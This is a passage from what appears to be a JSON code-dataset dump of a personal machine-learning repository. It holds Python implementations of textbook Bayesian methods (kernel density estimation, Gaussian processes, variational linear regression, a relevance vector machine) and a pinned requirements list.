* np.pi), (self.dist / 2.)) / self.data.size\n else:\n return 0\n\n def fit(self, X):\n self.data = X\n self.norm_ratio = self._calculate_normalization_ratio()\n return\n\n def predict(self, x):\n \"\"\"\n predict by kernel estimate\n \"\"\"\n x = np.asarray(x)\n prob = np.zeros_like(x)\n for i in range(x.size):\n for k in range(self.data.size):\n prob[i] += self._kernel(x[i] - self.data[k])\n return prob * self.norm_ratio\n\n\nif __name__ == '__main__':\n np.random.seed(19)\n rv = multivariate_normal(1, 1)\n x = np.linspace(-5, 5, 100)\n\n fig = plt.figure(figsize=(10, 6))\n ax1 = fig.add_subplot(111)\n ax1.plot(x, rv.pdf(x), \"-\", color=\"C0\", label=\"True Density Function\")\n samples = rv.rvs(100) # sampleの生成\n ax1.hist(samples, normed=True, facecolor='C0', alpha=0.3)\n\n for h in np.logspace(-1., .5, num=5):\n model = KernelEstimation(h, 1., \"gaussian\")\n model.fit(samples)\n preds = model.predict(x)\n ax1.plot(x, preds, \"--\", label=str(model))\n ax1.legend()\n fig.savefig(\"density_estimation.png\", dpi=150)\n" }, { "alpha_fraction": 0.5204333066940308, "alphanum_fraction": 0.5637617111206055, "avg_line_length": 30.24615478515625, "blob_id": "11f57489cc7699f318bb9b94be582ffd716cc1a0", "content_id": "f984e0d1fafd0225508c4c0b812a7c19d5e3045f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2217, "license_type": "no_license", "max_line_length": 119, "num_lines": 65, "path": "/prml/gaussian_process_prior.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n__author__ = \"yamaguchi\"\n\"\"\"\n6.4 ガウス過程の事前分布からのサンプリング\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Kernel(object):\n \"\"\"\n カーネル関数\n \"\"\"\n\n def __init__(self, theta1, theta2, theta3, theta4, kernel_type=\"gaussian\"):\n \"\"\"\n kernel = Θ1*exp(-Θ2/2*||x1-x2||^2) + Θ3 + Θ4*<x1|x2>\n\n :param str kernel_type: カーネルの種類を表す文字列. gaussian | ornstein を指定.\n \"\"\"\n self.theta1 = theta1\n self.theta2 = theta2\n self.theta3 = theta3\n self.theta4 = theta4\n self.kernel_type = kernel_type\n\n def _kernel(self, x1, x2):\n if self.kernel_type == \"gaussian\":\n return np.exp(-self.theta2 / 2. 
* np.inner(x1 - x2, x1 - x2))\n if self.kernel_type == \"ornstein\": # オルンシュタインウーレンベック過程\n return np.exp(-self.theta2 * np.power(np.inner(x1 - x2, x1 - x2), .5))\n\n def __call__(self, x1, x2):\n \"\"\"\n calculate kernel\n x1,x2: numpy.array, has same dimension\n \"\"\"\n val = self.theta1 * self._kernel(x1, x2) + self.theta3 + self.theta4 * (np.inner(x1, x2))\n return val\n\n def __str__(self):\n s = \"type={0.kernel_type}_theta1={0.theta1}_theta2={0.theta2}_theta3={0.theta3}_theta4={0.theta4}\".format(self)\n return s\n\n\nif __name__ == '__main__':\n\n kernel1 = Kernel(1, 10., 1., 0., kernel_type=\"gaussian\")\n num_of_spans = 200 # 離散化する数 増やせばなめらかさは増しますが、計算コストも増えます。\n\n gram_matrix = np.identity(num_of_spans)\n x_range = np.linspace(-1, 1, num_of_spans)\n for i in range(num_of_spans):\n for k in range(num_of_spans):\n x1 = x_range[i]\n x2 = x_range[k]\n gram_matrix[i][k] = kernel1(np.array([x1]), np.array([x2]))\n color = [\"C{i}\".format(**locals()) for i in range(3)]\n for i in range(10):\n y = np.random.multivariate_normal(np.zeros(num_of_spans), gram_matrix, 1)\n plt.plot(x_range, y[0], color[i % len(color)])\n plt.title(str(kernel1))\n plt.savefig(\"../figures/gp_prior.png\", dpi=150)\n plt.show()\n" }, { "alpha_fraction": 0.4882989823818207, "alphanum_fraction": 0.6898358464241028, "avg_line_length": 15.175141334533691, "blob_id": "4fef3330b845deafe3ab4e4f36f7f06d6912ba22", "content_id": "91c5a085e49c09d4882a6f6a8feab6ab6f2c38ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2863, "license_type": "no_license", "max_line_length": 41, "num_lines": 177, "path": "/requirements.txt", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "alabaster==0.7.9\nanaconda-client==1.6.0\nanaconda-navigator==1.4.3\nappdirs==1.4.3\nappnope==0.1.0\nappscript==1.0.1\nastroid==1.4.9\nastropy==1.3\nautopep8==1.3.1\nBabel==2.3.4\nbackports.shutil-get-terminal-size==1.0.0\nbeautifulsoup4==4.5.3\nbitarray==0.8.1\nblaze==0.10.1\nbokeh==0.12.4\nboto==2.45.0\nBottleneck==1.2.0\nbz2file==0.98\ncffi==1.9.1\nchainer==1.24.0\nchardet==2.3.0\nchest==0.2.3\nclick==6.7\ncloudpickle==0.2.2\nclyent==1.2.2\ncolorama==0.3.7\nCommonMark==0.5.4\nconda==4.3.18\nconfigobj==5.0.6\ncontextlib2==0.5.4\ncryptography==1.7.1\ncycler==0.10.0\nCython==0.25.2\ncytoolz==0.8.2\ndask==0.13.0\ndatashape==0.5.4\ndecorator==4.0.11\ndill==0.2.5\ndocutils==0.13.1\net-xmlfile==1.0.1\nfastcache==1.0.2\nfilelock==2.0.8\nflake8==3.3.0\nFlask==0.12\nFlask-Cors==3.0.2\nfuture==0.16.0\ngensim==1.0.1\ngevent==1.2.1\nGPy==1.6.1\ngreenlet==0.4.11\nh5py==2.6.0\nHeapDict==1.0.0\nidna==2.2\nimagesize==0.7.1\nipdb==0.10.3\nipykernel==4.5.2\nipython==5.1.0\nipython-genutils==0.2.0\nipywidgets==5.2.2\nisort==4.2.5\nitsdangerous==0.24\njdcal==1.3\njedi==0.9.0\nJinja2==2.9.4\njoblib==0.11\njsonschema==2.5.1\njupyter==1.0.0\njupyter-client==4.4.0\njupyter-console==5.0.0\njupyter-core==4.3.0\njupyterthemes==0.15.9\nKeras==2.0.4\nlanguage-check==1.0\nlazy-object-proxy==1.2.2\nlesscpy==0.12.0\nllvmlite==0.15.0\nlocket==0.2.0\nlxml==3.7.2\nMarkupSafe==0.23\nmatplotlib==2.0.0\nmccabe==0.6.1\nmecab-python3==0.7\nmistune==0.7.3\nmpmath==0.19\nmultipledispatch==0.4.9\nmysqlclient==1.3.10\nnbconvert==4.2.0\nnbformat==4.2.0\nnbsphinx==0.2.13\nnetworkx==1.11\nnltk==3.2.4\nnose==1.3.7\nnotebook==4.3.1\nnumba==0.30.1\nnumexpr==2.6.1\nnumpy==1.12.1\nnumpydoc==0.6.0\nodo==0.5.0\nopenpyxl==2.4.1\npackaging==16.8\npandas==0.19.2\nparamz==0.7.4\npartd==0.3.7\npathlib2==2.2.0\npatsy==0.4.1\npep8==
1.7.0\npexpect==4.2.1\npickleshare==0.7.4\nPillow==4.0.0\nply==3.10\nprompt-toolkit==1.0.9\nprotobuf==3.3.0\npsutil==5.0.1\nptyprocess==0.5.1\npy==1.4.32\npyasn1==0.1.9\npycodestyle==2.3.1\npycosat==0.6.1\npycparser==2.17\npycrypto==2.6.1\npycurl==7.43.0\npyflakes==1.5.0\nPygments==2.1.3\npyknp==0.3\npylint==1.6.4\npymc3==3.0\nPyMySQL==0.7.11\npyOpenSSL==16.2.0\npyparsing==2.2.0\npytest==3.0.5\npython-dateutil==2.6.0\npython-Levenshtein==0.12.0\npytz==2016.10\nPyWavelets==0.5.2\nPyYAML==3.12\npyzmq==16.0.2\nQtAwesome==0.4.3\nqtconsole==4.2.1\nQtPy==1.2.1\nrecommonmark==0.4.0\nredis==2.10.5\nrequests==2.12.4\nrope-py3k==0.9.4.post1\nscikit-image==0.12.3\nscikit-learn==0.18.1\nscipy==0.18.1\nseaborn==0.7.1\nsimplegeneric==0.8.1\nsingledispatch==3.4.0.3\nsix==1.10.0\nsmart-open==1.5.2\nsnowballstemmer==1.2.1\nsockjs-tornado==1.0.3\nSphinx==1.5.1\nspyder==3.1.2\nSQLAlchemy==1.1.5\nstatsmodels==0.6.1\nsympy==1.0\ntables==3.3.0\ntensorflow==1.1.0\nterminado==0.6\nTheano==0.9.0\ntoolz==0.8.2\ntornado==4.4.2\ntqdm==4.11.2\ntraitlets==4.3.2\nunicodecsv==0.14.1\nwcwidth==0.1.7\nWerkzeug==0.12.2\nwidgetsnbextension==1.2.6\nwrapt==1.10.8\nxgboost==0.6\nxlrd==1.0.0\nXlsxWriter==0.9.6\nxlwings==0.10.2\nxlwt==1.2.0\nyapf==0.16.1\n" }, { "alpha_fraction": 0.5031208395957947, "alphanum_fraction": 0.5316540598869324, "avg_line_length": 24.63428497314453, "blob_id": "ffd3d0b9885bcb338b9a8982fe6d2a734d5e6372", "content_id": "d8d14e49137cc3360949014400e2448851efe28b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4918, "license_type": "no_license", "max_line_length": 118, "num_lines": 175, "path": "/prml/variance_inference.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n__author__ = \"nyk510\"\n\"\"\"\n10-3 変分ベイズ法による線形回帰モデル\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nnp.random.seed(71)\n\n\ndef t_func(x):\n \"\"\"正解ラベルを作る関数\n x: numpy array.\n return t: target array. numpy.array like.\n \"\"\"\n t = np.sin(x * np.pi)\n # t = np.where(x > 0, 1, -1)\n return t\n\n\ndef plot_target_function(x, ax=None, color=\"default\"):\n \"\"\"target関数(ノイズなし)をプロットします\n \"\"\"\n if ax is None:\n ax = plt.subplot(111)\n if color is \"default\":\n color = \"C0\"\n ax.plot(x, t_func(x), \"--\", label=\"true function\", color=color, alpha=.5)\n return ax\n\n\ndef phi_poly(x):\n dims = 3\n return [x ** i for i in range(0, dims + 1)]\n\n\ndef phi_gauss(x):\n bases = np.linspace(-1, 1, 5)\n return [np.exp(- (x - b) ** 2. * 10.) for b in bases]\n\n\ndef qw(alpha, phi, t, beta):\n \"\"\"\n wの事後分布を計算します。\n 変分事後分布はガウス分布なので決定すべきパラメータは平均と分散です\n w ~ N(w| m, S)\n return ガウス分布のパラメータ m, S\n \"\"\"\n S = beta * phi.T.dot(phi) + alpha * np.eye(phi.shape[1])\n S = np.linalg.inv(S)\n m = beta * S.dot(phi.T).dot(t)\n return m, S\n\n\ndef qbeta(mn, Sn, t, Phi, N, c0, d0):\n \"\"\"\n betaの変分事後分布を決めるcn,dnを計算します\n 変分事後分布はガンマ分布なので決定すべきパラメータは2つです\n beta ~ Gamma(beta | a, b)\n return ガンマ分布のパラメータ a,b\n \"\"\"\n cn = c0 + .5 * N\n dn = d0 + .5 * (np.linalg.norm(t - Phi.dot(mn)) **\n 2. + np.trace(Phi.T.dot(Phi).dot(Sn)))\n return cn, dn\n\n\ndef qalpha(w2, a0, b0, m):\n \"\"\"\n alphaの変分事後分布を計算します。\n 変分事後分布はガンマ分布ですから決定すべきパラメータは2つです\n alpha ~ Gamma(alpha | a, b)\n return a, b\n \"\"\"\n a = a0 + m / 2.\n b = b0 + 1 / 2. 
* w2\n return a, b\n\n\ndef fit(phi_func, x, update_beta=False):\n xx = np.linspace(-2, 2., 100)\n if phi_func == \"gauss\":\n phi_func = phi_gauss\n elif phi_func == \"poly\":\n phi_func == phi_poly\n else:\n if type(phi_func) == \"function\":\n pass\n else:\n raise Exception(\"invalid phi_func\")\n Phi = np.array([phi_func(xi) for xi in x])\n Phi_xx = np.array([phi_func(xi) for xi in xx])\n\n # 変分事後分布の初期値\n N, m = Phi.shape\n mn = np.zeros(shape=(Phi.shape[1],))\n Sn = np.eye(len(mn))\n beta = 10.\n alpha = .1\n a0, b0 = 1, 1\n c0, d0 = 1, 1\n\n pred_color = \"C1\"\n\n freq = 2\n n_iter = 3 * freq\n n_fig = int(n_iter / freq)\n\n fig = plt.figure(figsize=(3 * n_fig, 4))\n data_iter = []\n data_iter.append([alpha, beta])\n\n for i in range(n_iter):\n print(\"alpha:{alpha:.3g} beta:{beta:.3g}\".format(**locals()))\n\n mn, Sn = qw(alpha, Phi, t, beta)\n w2 = np.linalg.norm(mn) ** 2. + np.trace(Sn)\n a, b = qalpha(w2, a0, b0, m)\n c, d = qbeta(mn, Sn, t, Phi, N, c0, d0)\n\n alpha = a / b\n\n if update_beta:\n # betaが更新される\n beta = c / d\n\n data_iter.append([alpha, beta])\n\n if i % freq == 0:\n k = int(i / freq) + 1\n ax_i = fig.add_subplot(1, n_fig, k)\n plot_target_function(xx, ax=ax_i)\n ax_i.plot(x, t, \"o\", label=\"data\", alpha=.8)\n\n m_line = Phi_xx.dot(mn)\n sigma = (1. / beta + np.diag(Phi_xx.dot(Sn).dot(Phi_xx.T))) ** .5\n ax_i.plot(xx, m_line, \"-\", label=\"predict-line\", color=pred_color)\n ax_i.fill_between(xx, m_line + sigma, m_line - sigma, label=\"Predict 1 sigma\", alpha=.2, color=pred_color)\n ax_i.set_title(\n \"n_iter:{i} alpha:{alpha:.3g} beta:{beta:.3g}\".format(**locals()))\n ax_i.set_ylim(-2, 2)\n ax_i.set_xlim(-1.5, 1.5)\n if i == 0:\n ax_i.legend(loc=4)\n\n fig.tight_layout()\n return fig, data_iter\n\n\nif __name__ == \"__main__\":\n n_samples = 20\n x = np.random.uniform(-1, 1, n_samples)\n noise = np.random.normal(scale=1., size=n_samples)\n t = t_func(x) + noise\n\n plt.figure(figsize=(4, 4))\n xx = np.linspace(-1, 1., 100)\n plot_target_function(xx)\n plt.plot(x, t, \"o\", label=\"data\")\n plt.ylim(-3, 3)\n plt.legend(loc=4)\n plt.tight_layout()\n plt.savefig(\"data.png\", dpi=200)\n\n fig, data_iter = fit(phi_func=\"gauss\", x=x, update_beta=False)\n fig.savefig(\"iter_not update_beta.png\", dpi=200)\n fig, data_iter = fit(phi_func=\"gauss\", x=x, update_beta=True)\n fig.savefig(\"iter_update_beta.png\", dpi=200)\n\n fig = plt.figure(figsize=(6, 6))\n ax1 = fig.add_subplot(111)\n pd.DataFrame(data_iter, columns=[\"alpha\", \"beta\"]).plot(ax=ax1)\n fig.savefig(\"alpha_beta_trans.png\", dpi=200)\n" }, { "alpha_fraction": 0.4991616904735565, "alphanum_fraction": 0.5257484912872314, "avg_line_length": 28.401409149169922, "blob_id": "1e652d1f23ee10df5cb59b7acbf74033118dc1d8", "content_id": "8ed82f8857fa64a822359800af8da1a1737e13ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4289, "license_type": "no_license", "max_line_length": 118, "num_lines": 142, "path": "/prml/gaussian_process_estimation.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\"\"\"\nガウス過程による予測を行うスクリプト\n\"\"\"\n\n__author__ = \"nyk510\"\n\nimport numpy as np\n\n\nclass GaussianKernel(object):\n def __init__(self, theta1=9., theta2=4., theta3=1., theta4=1.):\n self.theta1 = theta1\n self.theta2 = theta2\n self.theta3 = theta3\n self.theta4 = theta4\n\n def __call__(self, x1, x2):\n '''Calculate Kernel.\n\n @x1: numpy array. shape (m,).\n @x2: numpy array. 
shape (m,).\n has the same dimension m of x1.\n '''\n\n return self.theta1 * np.exp(-self.theta2 / 2 * np.linalg.norm(x1 - x2) ** 2) + self.theta3 + self.theta4 * (\n x1 * x2).sum()\n\n\nclass GaussianProcess(object):\n def __init__(self, kernel='gaussian', beta=10.):\n '''\n @kernel: string or GaussianKernel instance.\n @beta: float.\n shrinkage parameter.\n when beta is larger, the predict is more conservative.\n '''\n self.beta = beta\n\n if kernel == 'gaussian':\n self.kernel = GaussianKernel()\n elif isinstance(kernel, GaussianKernel):\n self.kernel = kernel\n else:\n raise TypeError(\"Invalid type kernel.\")\n\n def fit(self, X, t):\n \"\"\"Fit parameter\n calculate data's kernel and it's inverse.\n\n @X: input data xs.\n @t: input data target values. like numpy.array.\n \"\"\"\n self.X = X\n self.t = t\n C = []\n for x_i in X:\n c = []\n for x_k in X:\n c.append(self.kernel(x_i, x_k))\n C.append(c)\n\n C = np.array(C)\n print(C.shape)\n\n # ここがガウス過程での予測のボトルネック: O(N^3)\n self.C_n_inv = np.linalg.inv(np.array(C) + np.eye(len(X)) * self.beta)\n\n return\n\n def predict(self, x):\n \"\"\"predict value\n :param x: \n input value for predict\n :return (m(x),sigma(x))\n tuple of predict value's mean and sigma\n :rtype tuple\n \"\"\"\n\n k = []\n\n # fitに使用したデータとのカーネルを計算\n for x_i in self.X:\n k.append(self.kernel(x, x_i))\n k = np.array(k)\n\n m_x = k.T.dot(self.C_n_inv).dot(self.t)\n variance = self.kernel(x, x) + self.beta - \\\n k.T.dot(self.C_n_inv).dot(k)\n\n return m_x, variance ** .5\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n\n sample_size_max = 40\n true_function = np.sin\n\n np.random.seed(71)\n x = np.random.uniform(-1, .7, sample_size_max)\n train_t = np.sin(x * np.pi) + np.random.normal(scale=.3, size=sample_size_max)\n train_dataset = [x, train_t]\n plt.plot(x, train_t, \"o\", label='Training Data', color=\"C0\")\n plt.plot(np.linspace(-1, 1, 100), true_function(np.linspace(-1, 1, 100) * np.pi), \"--\", label='True Function',\n color=\"C0\")\n plt.legend(loc=2)\n plt.title(\"training data\")\n\n # training data の保存\n # plt.savefig('True_function_and_training_data.png', dpi=150)\n plt.show()\n\n model = GaussianProcess(beta=.1)\n samples_split = [1, 4, 8, 16, 32]\n plt.figure(figsize=(len(samples_split) * 3, 4))\n for i, sample_num in enumerate(samples_split):\n x = train_dataset[0][:sample_num]\n t = train_dataset[1][:sample_num]\n model.fit(x, t)\n Xs = np.linspace(-1, 1, 100)\n pred_t = []\n for xx in Xs:\n pred_t.append(model.predict(xx))\n pred_t = np.array(pred_t)\n\n plt.subplot(1, len(samples_split), i + 1)\n plt.plot(x, t, \"o\", label='Training Data', color=\"C0\")\n plt.plot(np.linspace(-1, 1, 100), true_function(np.linspace(-1, 1, 100) * np.pi), \"--\", label='True Function',\n color=\"C0\")\n plt.plot(Xs, pred_t[:, 0], \"-\", label='Predict', color=\"C1\")\n plt.fill_between(Xs, pred_t[:, 0] + pred_t[:, 1], pred_t[:, 0] - pred_t[:, 1], alpha=.2,\n label=r'Predict $1-\\sigma$ line', color=\"C1\")\n plt.xlim(-1, 1)\n plt.ylim(-2, 2)\n plt.title(\"Data size: {0}\".format(sample_num))\n if i == 0:\n plt.legend()\n\n plt.tight_layout()\n plt.savefig('../figures/gp-estimation_by_training_data.png', dpi=150)\n plt.show()\n" }, { "alpha_fraction": 0.5208094716072083, "alphanum_fraction": 0.5481099486351013, "avg_line_length": 30.745454788208008, "blob_id": "29475afc392764316dd31bbb367bf3419c65123f", "content_id": "b4d782710274286eeaeb8430e1600f2ec19c35b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 5386, "license_type": "no_license", "max_line_length": 112, "num_lines": 165, "path": "/prml/rvm.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\"\"\"\nrelevant vector machine\n\"\"\"\n\n__author__ = \"nyk510\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass RVM(object):\n def __init__(self, alpha=1., beta=1, repeat_num=20, kernel=\"gaussian\"):\n self.init_alpha = alpha\n self.init_beta = beta\n self.repeat_num = repeat_num\n self.kernel_name = kernel\n if kernel == \"gaussian\":\n self.kernel = self.gaussian_kernel\n elif kernel == \"poly\":\n self.kernel = self.poly_kernel\n else:\n raise NameError(\"Invalid Kernel Name\")\n\n def __str__(self):\n s = \"kernel-{0.kernel_name}\".format(self)\n return s\n\n def gaussian_kernel(self, x1, x2):\n \"\"\"\n :param x1: \n :param x2: \n :return: \n \"\"\"\n return np.exp(-(x1 - x2) ** 2) * 10.\n\n def poly_kernel(self, x1, x2):\n d = 5\n return (1 + np.dot(x1, x2)) ** 5\n\n def _compute_loglikelihood(self, beta, A):\n C = 1. / beta * np.eye(self.N) + self.Phi.dot(np.linalg.inv(A)).dot(self.Phi.T)\n return -1 / 2. * (\n self.N * np.log(2. * np.pi) + np.log(np.linalg.det(C)) + self.t.T.dot(np.linalg.inv(C)).dot(self.t))\n\n def fit(self, X, t):\n self.X = np.array(X)\n self.N = len(t)\n self.t = np.array(t)\n Phi = []\n Phi.append(np.ones_like(X))\n for x1 in X:\n Phi.append(self.kernel(x1, X))\n self.Phi = np.array(Phi).T\n sigma_trans = []\n m_trans = []\n alpha_trans = []\n beta_trans = []\n log_likelihoods = []\n\n # 信頼度 alpha と 分散 beta の初期化\n alpha_trans.append(np.ones(len(t) + 1) * self.init_alpha)\n beta_trans.append(self.init_beta)\n\n for x in range(self.repeat_num):\n A = np.diag(alpha_trans[-1])\n log_likelihood = self._compute_loglikelihood(beta_trans[-1], A)\n print(\"log-likelihood\\t{log_likelihood}\".format(**locals()))\n sigma = np.linalg.inv(A + beta_trans[-1] * self.Phi.T.dot(self.Phi))\n m = beta_trans[-1] * sigma.dot(self.Phi.T).dot(t)\n gamma = 1 - alpha_trans[-1] * np.diag(sigma)\n alpha_n = gamma / (m * m)\n beta_n = (self.N - sum(gamma)) / (np.linalg.norm(self.t - self.Phi.dot(m)) ** 2)\n\n # 上限を超えた信頼度になったベクトルの信頼度を切り下げる\n alpha_n[alpha_n > 10e+10] = 10e+10\n\n # logとして配列に保存\n alpha_trans.append(alpha_n)\n beta_trans.append(beta_n)\n m_trans.append(m)\n sigma_trans.append(sigma)\n log_likelihoods.append(log_likelihood)\n\n self.ms = np.array(m_trans)\n self.sigmas = np.array(sigma_trans)\n self.betas = np.array(beta_trans)\n self.alphas = np.array(alpha_trans)\n self.log_likelihoods = np.array(log_likelihoods)\n\n def predict(self, x):\n phi_x = np.r_[np.array([1]), self.kernel(x, self.X)]\n\n avg = self.ms[-1].T.dot(phi_x)\n sigma = 1. / self.betas[-1] + phi_x.T.dot(self.sigmas[-1]).dot(phi_x)\n return avg, sigma\n\n def get_support_vectors(self, min_max_ratio=.2):\n \"\"\"\n サポートベクトルを取得します\n \n :param float min_max_ratio: サポートベクトルの信頼度の割合\n \"\"\"\n\n alpha = self.alphas[-1][1::]\n min_alpha = min(alpha)\n upper_limit = min_alpha / min_max_ratio\n support_X = self.X[alpha < upper_limit]\n support_t = self.t[alpha < upper_limit]\n return support_X, support_t\n\n\nif __name__ == '__main__':\n\n sample_size = 30\n np.random.seed(71)\n\n\n def true_func(x):\n return np.sin(5. 
* x) + x\n\n\n X = np.random.uniform(low=-1.1, high=1.1, size=sample_size)\n np.sort(X)\n t = true_func(X) + np.random.normal(loc=0., scale=.2, size=sample_size)\n model = RVM(repeat_num=20, kernel=\"gaussian\")\n model.fit(X, t)\n\n X1 = np.linspace(-1.5, 1.5, 100)\n result = []\n for x in X1:\n avg1, sigma1 = model.predict(x)\n result.append([avg1, sigma1])\n result = np.array(result)\n\n fig = plt.figure(figsize=(8, 6))\n ax1 = fig.add_subplot(111)\n ax1.plot(X1, result[:, 0], color=\"C1\", label=\"Predict Mean\")\n ax1.fill_between(X1, result[:, 0] + result[:, 1] ** .5, result[:, 0] - result[:, 1] ** .5, alpha=.2,\n label=\"Predict 1 sigma\", color=\"C1\")\n ax1.plot(X, t, \"o\", color=\"C0\", markersize=5, label=\"Training Data\")\n ax1.plot(X1, true_func(X1), \"--\", label=\"True Function\", color=\"C0\")\n sX, st = model.get_support_vectors()\n ax1.plot(sX, st, \"o\", color=\"C2\", markersize=5, label=\"Support Vectors\")\n ax1.legend()\n ax1.set_xlim(min(X1), max(X1))\n ax1.set_title(str(model))\n fig.savefig(\"../figures/rvm_predict.png\", dpi=150)\n\n fig = plt.figure(figsize=(6, 6))\n ax1 = fig.add_subplot(111)\n ax1.bar(range(sample_size + 1), np.log(model.alphas[-1]), width=.9)\n ax1.set_title(\"Relevant (log alpha)\")\n ax1.set_xlabel(\"Data Index\")\n ax1.set_ylabel(\"Value (log-scale)\")\n fig.tight_layout()\n\n fig = plt.figure(figsize=(6, 6))\n ax1 = fig.add_subplot(111)\n ax1.pcolor(np.log(model.alphas).T)\n ax1.set_xlabel(\"Iteration\")\n ax1.set_ylabel(\"Data Index\")\n ax1.set_title(\"Log Alpha Transition\")\n fig.tight_layout()\n plt.show()\n" }, { "alpha_fraction": 0.5466588735580444, "alphanum_fraction": 0.5663354992866516, "avg_line_length": 30.69135856628418, "blob_id": "978a60d7f545e3f5c1b517fc00d6ec9da0e53a4e", "content_id": "e25c361f8b88e62cd78b4a9004aa21fd36704593", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5903, "license_type": "no_license", "max_line_length": 117, "num_lines": 162, "path": "/prml/linear_regression.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\"\"\"\nSection3\nLinear Regression\n\"\"\"\n\n__author__ = \"nyk510\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\n\n\nclass LinearRegression(object):\n \"\"\"\n シンプルな線形回帰問題をときます。\n Evidence近似による重みパラメータwの分散αと、ノイズパラメータβの最大化も行います。 \n \"\"\"\n\n def __init__(self, alpha=.001, beta=1., repeat_num=10):\n \"\"\"\n :param alpha_list: alpha格納用リスト。alphaはN(w|o,1/alpha*I)で表される精度パラメータ\n :param beta_list: beta格納用リスト。betaはモデルN(t|w^T*phi(x),1/beta)での精度パラメータ\n :param repeat_num: fitを行う際の繰り返し回数\n \"\"\"\n self.init_alpha = alpha\n self.init_beta = beta\n self.repeat_num = repeat_num\n\n def fit(self, Phi, t):\n \"\"\"\n Xとtからパラメータwを推定\n :param array-like Phi\n training data, shape = (n_samples, n_features)\n :param array-like t:\n labels for Phi, shape = (n_samples, ) \n :return self\n :rtype: LinearRegression\n \"\"\"\n\n t = np.array(t)\n N = len(t)\n dim_w = len(Phi[0])\n # 計画行列の固有値計算を先にしておく\n self.eigenvalues = np.linalg.eig(Phi.T.dot(Phi))[0]\n self.eigenvalues[np.abs(self.eigenvalues) < .0001] = 0. 
# 情報量が小さい次元の固有値はすべて0だと思うことにする。\n # alphaとbetaを格納する為のリストを用意\n # note:最初はpythonのリストで計算してあとでnumpy.arrayにしたほうが np.append とかよりも早い\n alphas = []\n betas = []\n w = []\n gammas = []\n alphas.append(self.init_alpha)\n betas.append(self.init_beta)\n\n for i in range(self.repeat_num):\n alpha = alphas[-1]\n beta = betas[-1]\n A = alpha * np.eye(dim_w) + beta * Phi.T.dot(Phi)\n # print \"A: \",A\n m_N = np.linalg.solve(A, beta * (Phi.T.dot(t)))\n # print \"m_N\",m_N\n w.append(m_N)\n gam = sum(self.eigenvalues * beta / (self.eigenvalues * beta + alpha))\n gammas.append(gam)\n new_alpha = gam / sum(m_N * m_N)\n new_beta = (N - gam) / ((t - Phi.dot(m_N)).dot(t - Phi.dot(m_N)))\n # print \"a: \",new_alpha,\"b: \",new_beta,\"gamma: \",gam\n alphas.append(new_alpha)\n betas.append(new_beta)\n\n self.alpha_list = np.array(alphas)\n self.beta_list = np.array(betas)\n self.w = np.array(w)\n self.gam = np.array(gammas)\n return self\n\n def predict(self, x):\n \"\"\"\n :param np.ndarray x:\n :rtype np.ndarray\n \"\"\"\n return x.dot(self.w)\n\n\ndef compute_polynominal_matrix(X, dimensions):\n \"\"\"\n 単純な多項式による特徴量を返します\n X: numpy.ndarray like\n return: Phi 特徴量ベクトル numpy.ndarray. len(X)*dimensions 行列\n :type dimensions: object\n \"\"\"\n Phi = [np.ones_like(X)]\n for i in range(dimensions - 1):\n Phi.append(Phi[-1] * X)\n return np.array(Phi).T\n\n\ndef compute_gaussian_phi(X, dim=10, s=1.):\n \"\"\"\n ガウス固定基底に基づく特徴量matrixを返します.\n 固定規定の基準点は [-pi, pi] を dim の数で区切った点.\n :param np.ndarray X:\n 変換する特徴量. shape = (n_samples, )\n\n :param int dim: ガウス基底の次元数\n :param float s: ガウス基底の分散パラメータ\n 大きいと分布がゆるやかになります\n 要するに、予測分布が遠いデータ点の情報も参照する用になります\n \"\"\"\n bins = np.linspace(-np.pi, np.pi, num=dim).reshape(1, -1)\n X = X.reshape(-1, 1)\n dist = X - bins\n phi = np.exp(- dist ** 2. / (2 * s ** 2.))\n return np.hstack((phi, np.ones_like(X)))\n\n\nif __name__ == '__main__':\n\n # make test data\n sample_num = 20\n true_beta = 10. # 精度パラメータ\n phi_dim = 20 # 固定基底の数\n np.random.seed(71)\n X = np.random.uniform(-np.pi, np.pi, sample_num) # -pi~+piまで\n X.sort()\n t = np.sin(X) + np.random.normal(loc=0.0, scale=pow((1 / true_beta), .5), size=sample_num)\n # plt.plot(X,t,\"o\",label=\"Training Data\")\n # plt.plot(np.linspace(-np.pi,np.pi,200),np.sin(np.linspace(-np.pi,np.pi,200)),\"-\",label=\"True Target(No Noize)\")\n # plt.show()\n\n Phi = compute_polynominal_matrix(X, dimensions=phi_dim)\n Phi = compute_gaussian_phi(X, dim=phi_dim, s=1.)\n\n model = LinearRegression(alpha=1e-5, beta=10., )\n model.fit(Phi, t)\n\n # predictionグラフの為の特徴量づくり\n X_p = np.linspace(-np.pi, np.pi, 200)\n # Phi_p = compute_polynominal_matrix(X_p,dimentions=phi_dim) #多項式基底関数\n Phi_p = compute_gaussian_phi(X_p, dim=phi_dim, s=1.) 
